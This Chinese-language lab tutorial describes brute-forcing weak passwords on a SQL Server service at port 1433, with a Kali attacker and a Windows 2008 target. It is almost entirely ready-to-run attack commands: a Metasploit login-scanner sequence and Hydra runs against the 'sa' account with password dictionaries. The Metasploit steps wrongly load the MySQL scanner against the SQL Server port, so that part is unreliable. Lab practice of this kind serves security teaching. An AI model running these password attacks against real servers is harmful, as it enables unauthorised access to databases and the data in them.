弱口令爆破1433端口
准备工作
1.攻击机:kail 靶机:Windows 2008
2.靶机上的操作
打开1433端口服务
3.靶机和攻击机能ping通
Metasploit爆破
1.msfconsole
2.use auxiliary/scanner/mysql/mysql_login
3.set rhosts 192.168.8.5
4.set port 1433
5.set user_file /root/lz.txt
6.set pass_file /root/top100_vn.txt
注:暴力破解使用的用户/密码字典自己提供。
Hydra暴力破解
1.使用登录名进行爆破
hydra -l sa -P '/root//top100_vn.txt' 192.168.8.5 mssql
2.使用字典进行爆破
hydra -L /root/lz.txt -P /root/top100_vn.txt 192.168.8.5 mssql -vv